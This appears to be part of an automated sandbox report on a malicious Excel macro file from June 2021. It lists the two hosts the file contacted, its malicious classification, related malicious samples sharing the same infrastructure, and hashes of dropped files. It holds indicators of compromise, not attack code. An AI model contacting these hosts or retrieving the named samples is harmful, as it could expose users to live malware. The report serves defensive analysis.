                                                                                    https://incidents.diagnostics.office.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                      high
                                                                                      https://clients.config.office.net/user/v1.0/iosFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                        high
                                                                                        https://insertmedia.bing.office.net/odc/insertmediaFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                          high
                                                                                          https://o365auditrealtimeingestion.manage.office.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                            high
                                                                                            https://outlook.office365.com/api/v1.0/me/ActivitiesFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                              high
                                                                                              https://api.office.netFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                high
                                                                                                https://incidents.diagnosticssdf.office.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                  high
                                                                                                  https://asgsmsproxyapi.azurewebsites.net/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://clients.config.office.net/user/v1.0/android/policiesFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                    high
                                                                                                    https://entitlement.diagnostics.office.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                      high
                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                        high
                                                                                                        https://outlook.office.com/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                          high
                                                                                                          https://storage.live.com/clientlogs/uploadlocationFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                            high
                                                                                                            https://templatelogging.office.com/client/logFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office365.com/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                high
                                                                                                                https://webshell.suite.office.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                    high
                                                                                                                    https://management.azure.com/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                      high
                                                                                                                      https://login.windows.net/common/oauth2/authorizeFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                        high
                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://graph.windows.net/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.powerbi.com/beta/myorg/importsFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                            high
                                                                                                                            https://devnull.onenote.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                              high
                                                                                                                              https://ncus.pagecontentsync.FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v2FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/macFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://api.cortana.aiFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devicesFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorizeFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://staging.cortana.aiFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://loki.delve.office.com/api/v1/configuration/officewin32/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                                  high

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  5.100.155.169
                                                                                                                                                  theottomandoner.comUnited Kingdom
                                                                                                                                                  394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                                                                  108.167.165.249
                                                                                                                                                  senderoalcielo.comUnited States
                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:438634
                                                                                                                                                  Start date:22.06.2021
                                                                                                                                                  Start time:21:16:20
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 11s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:idea-22543577.xlsm
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:19
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal64.expl.evad.winXLSM@7/9@2/2
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsm
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 104.43.139.144, 92.122.145.220, 104.43.193.48, 52.109.76.68, 52.109.88.37, 52.109.12.21, 13.88.21.125, 20.82.210.154, 20.54.104.15, 40.112.88.60, 93.184.221.240, 80.67.82.211, 80.67.82.235, 20.82.209.183
                                                                                                                                                  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  21:17:14API Interceptor1143x Sleep call for process: splwow64.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  5.100.155.169http://y.novobanco.opengateautospray.com/674616e69612e726f7361406e6f766f62616e636f2e7074Get hashmaliciousBrowse
                                                                                                                                                  • y.novobanco.opengateautospray.com/674616e69612e726f7361406e6f766f62616e636f2e7074
                                                                                                                                                  108.167.165.249idea-22543577.xlsmGet hashmaliciousBrowse

                                                                                                                                                    Domains

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    senderoalcielo.comidea-22543577.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 108.167.165.249

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    UNIFIEDLAYER-AS-1USidea-22543577.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    Fra8994.exeGet hashmaliciousBrowse
                                                                                                                                                    • 162.241.60.126
                                                                                                                                                    WXs8v9QuE7.exeGet hashmaliciousBrowse
                                                                                                                                                    • 50.87.146.99
                                                                                                                                                    tender-1235416393.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 192.185.88.195
                                                                                                                                                    tender-1235416393.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 192.185.88.195
                                                                                                                                                    Order.exeGet hashmaliciousBrowse
                                                                                                                                                    • 108.167.183.94
                                                                                                                                                    Habib_Bank Payment Advice.doc__.rtfGet hashmaliciousBrowse
                                                                                                                                                    • 162.144.79.7
                                                                                                                                                    heoN5wnP2d.exeGet hashmaliciousBrowse
                                                                                                                                                    • 74.220.199.8
                                                                                                                                                    FidKy67SWO.exeGet hashmaliciousBrowse
                                                                                                                                                    • 192.254.185.252
                                                                                                                                                    RFQ-BCM 03122020.exeGet hashmaliciousBrowse
                                                                                                                                                    • 50.87.249.240
                                                                                                                                                    plan-1637276620.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 192.185.21.116
                                                                                                                                                    idea-1232922316.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 162.241.194.107
                                                                                                                                                    Orden de compra.exeGet hashmaliciousBrowse
                                                                                                                                                    • 192.185.0.218
                                                                                                                                                    Drawing.exeGet hashmaliciousBrowse
                                                                                                                                                    • 162.241.61.229
                                                                                                                                                    aim-1028486377.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 192.232.222.161
                                                                                                                                                    VM_5823_05_24_2-2.htmlGet hashmaliciousBrowse
                                                                                                                                                    • 162.214.148.174
                                                                                                                                                    KTOpmUzBlp.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 162.241.87.244
                                                                                                                                                    KTOpmUzBlp.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 162.241.61.218
                                                                                                                                                    KTOpmUzBlp.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 162.241.87.244
                                                                                                                                                    eHTLcWfhgv.exeGet hashmaliciousBrowse
                                                                                                                                                    • 74.220.199.8
                                                                                                                                                    PUBLIC-DOMAIN-REGISTRYUSidea-22543577.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    Fra8995.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.198.143
                                                                                                                                                    Fra8996.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.198.143
                                                                                                                                                    Fra8997.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.199.223
                                                                                                                                                    plan-1637276620.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.50.160.62
                                                                                                                                                    aim-1028486377.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 103.21.59.25
                                                                                                                                                    7qVSiXSTdETO7cX.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.198.143
                                                                                                                                                    PI Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.198.143
                                                                                                                                                    Payment Advice Note from 21.06.2021 to 608720.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.199.225
                                                                                                                                                    Inquiry pdf.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.198.143
                                                                                                                                                    HYr6YeH1RP.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.198.143
                                                                                                                                                    fng1AXSgue.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.199.225
                                                                                                                                                    memorandum.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.199.223
                                                                                                                                                    Bank Betails.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.199.225
                                                                                                                                                    SecuriteInfo.com.Trojan.PackedNET.854.8381.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.199.233
                                                                                                                                                    AWB & Shipping Documents.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.199.224
                                                                                                                                                    order no ORD00404083_01.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.199.223
                                                                                                                                                    PO#4500484210.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.199.233
                                                                                                                                                    Request for Catalog and quotation.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.198.143
                                                                                                                                                    INQUIRY pdf.exeGet hashmaliciousBrowse
                                                                                                                                                    • 208.91.199.223

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19OzygoxrbzzvtmyjupcpndcovpjxtqpiywjSigned.exeGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    2t71031BUz.exeGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    DmtxjmmsiwawliehhrzxcpwdxtexpegwgoSigned.exeGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    tender-1235416393.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    Payment Ref 24,845.docxGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    3yBar59k6g.exeGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    rVkZUqVZ40.exeGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    idea-1232922316.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    askinstall41.exeGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    askinstall41.exeGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    Potvrda o uplati u eurima.exeGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    6Lld5WIJBW.exeGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    pvWf7hYnWu.exeGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    TT_COPY.MT103.SWIFT.docxGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    MT103.docxGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    FAX.HTMLGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    VM_5823_05_24_2-2.htmlGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    Outside Caller 06-18-21.HTMLGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    KTOpmUzBlp.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249
                                                                                                                                                    MzhINp1fRi.exeGet hashmaliciousBrowse
                                                                                                                                                    • 5.100.155.169
                                                                                                                                                    • 108.167.165.249

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\FF586352-751C-4478-9E87-FF9CF397D4DE
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):134914
                                                                                                                                                    Entropy (8bit):5.367825535284073
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:pcQIKNgeBXA3gBwlpQ9DQW+z7Y34ZliKWXboOidX5E6LWME9:xEQ9DQW+zvXO1
                                                                                                                                                    MD5:07158A29A2EEE64999158D2BE14B8807
                                                                                                                                                    SHA1:65917A4FB5D0653E2419414FB22C5C0B7E1C9588
                                                                                                                                                    SHA-256:DF7E37BE4E59DE60F520C6FBF06319843BC5A6CF96A8FBFC74B51740117DB4A4
                                                                                                                                                    SHA-512:7E6951CC1EFE2F72958F07F4F6DC35D6C94578176C4E677FA4A5AA6DC8048F06744CC1B45ED4F656E64112261D2665DD0C4394BDD1980C3719735F02F4F82125
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-22T19:17:14">.. Build: 16.0.14221.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\12BD43E5.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 1133 x 589, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):75711
                                                                                                                                                    Entropy (8bit):7.915372969602997
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:gxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncT:7br0o45GUgHhX8jC9yST
                                                                                                                                                    MD5:8296338A43942E3107802E3062AC1270
                                                                                                                                                    SHA1:46E67A586ED8A961AF7FD03140547C1CB2BAC227
                                                                                                                                                    SHA-256:BE5F61F2AE8E4C9F9ADBCE5EC33D4C01A331734FFC5818AA8E45CF60456C5ABD
                                                                                                                                                    SHA-512:C2179050A009C990CBFE6EA45E44AA6307AAC938E3EA523D31713F657E09131B07ACEBB31FC353C5A23E7D6323C4EC01736CFF092ACA1D49B58E71A07F1171AD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .PNG........IHDR...m...M......p......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^......g......q.|.....<...'r....-^..c.If.,ffX1K.[....Z....V.LO5L..J+...z.]]u..>.==.......................Q..........(.......p.t........8.:.............................g@G........3............Q..........(.......p.t........8.:.............................g@G........3............Q..........(.......p.t......j.7ZP...:...0S....z5T........).WU=j.*.$H.B.P.)l.6Q..'.l..7..k..J.o..._....6..{C...r.|2W.[a...m.BI.?...5......D....4;B...@b.HiP.jfj}@.S9..E.*J...O..BA5.e:...q!.SP....w....(..._.,..I.|a.7+>.........A#......3v..37......w(..j...C.R..H3.f.Q....0....h~...)aM..).vQ.1..+J@Q.....Oa+...!5.e.b...V..|..d../.......vC..&..=9...n.....^6-.tRj...O..{j.e.N....o..~..^.......#!...T...C.#.>.E,[.,......E....h~B.Y./....(2.......(...`....~w#.%..R..{........N.Z....k]8>..dW..^s....U...9...W.e...]...W...i.{u.>.s.,L.>1..)....f..b..Z.nai$.Q.."...W2.......Q...G...z....Ea......
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\9DC40000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):93025
                                                                                                                                                    Entropy (8bit):7.835909433031108
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:TsxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncLHdVlz9:TXbr0o45GUgHhX8jC9ySLHBh
                                                                                                                                                    MD5:3BDF2667F12D4D905D0DC4AFC01E4C63
                                                                                                                                                    SHA1:9D26FEFA0B736F038570EFB98D8755B7D0930AE2
                                                                                                                                                    SHA-256:2F2B4F6BBCE9B1246B9D99752EC70FAFDBBDFF8A8FC2020A758EB35C5109C0D3
                                                                                                                                                    SHA-512:C5105394DCCD97D89839D4096019F7C84A5DC45E222D9D473E1AC740EE5F069C020D59D4C7EBA276C9CD3E047C2580FB83785DED1E0D2A638D91A84B6153039F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .V.n.0....?.........r.Y.m...@.c.07p.....e.m.....m...q...jaM....w5;.F..'.......++0.....j..dW..O..e.,(.a...7.Q.`.V>.....V$z...B.E..|4......)c....f...vA.WJ...z._.....h)....N.!).l.%(/.,AW."..-@...Q.c|..(1d|.3.....Ys.>....~2{.*..R.V.<%..a.#........ZAq/b..,......8.z?.6.d3-...`........S.4&.{U....D...v...H6._...S........B.gv6e=.9.7....v...t..T...}.X./.Kw............R.......p.......C...9..?...PQ.d...8...h./5....R......m*G... &..F5......n.'..j..w'../.......PK..........!.!=J.............[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Tue Jun 22 18:17:21 2021, atime=Tue Jun 22 18:17:21 2021, length=12288, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):904
                                                                                                                                                    Entropy (8bit):4.668812718446673
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:8vXU/duCH2KOg4dc4L6f8+WrjAZ/DYbD+SeuSeL44t2Y+xIBjKZm:8QigmK2AZbcDg7aB6m
                                                                                                                                                    MD5:AC114E5AF0816A9FFEBCDDF67409B7D1
                                                                                                                                                    SHA1:19C55A294B5D04C4627FB777C450A4DA8BF5882C
                                                                                                                                                    SHA-256:8229291C89D45BBD3B32FB1688BEA4444CC78C78710389D3C6FB6BA37C85AA55
                                                                                                                                                    SHA-512:0D49F48BD71D73BDF63C96922856548A886868D0177C246D1433BF7161C765966600DDB798E385DB99B6CD7F795D18EDA323B392756D2E839D23362EDDD62000
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F.............-..8..9.g.....9.g...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R......#J.....................T..j.o.n.e.s.....~.1......R+...Desktop.h.......N...R+......Y..............>.....p.).D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......651689...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\idea-22543577.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:52 2020, mtime=Tue Jun 22 18:17:22 2021, atime=Tue Jun 22 18:17:22 2021, length=93025, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2150
                                                                                                                                                    Entropy (8bit):4.7168949323016856
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:8ht7igmnAkCY5nhACbUjQnjD47aB6myht7igmnAkCY5nhACbUjQnjD47aB6m:877ixJnyCiQnlB6p77ixJnyCiQnlB6
                                                                                                                                                    MD5:5F23734177853EFE4B1E30E48651F5B1
                                                                                                                                                    SHA1:0CCCD5FB9265BFEF5BCDA0FC255263D48ACD433F
                                                                                                                                                    SHA-256:629DB93CCB986DC37646B5DACCAD835A2F8DA5E4789B30FA0EE0A7D46199AB23
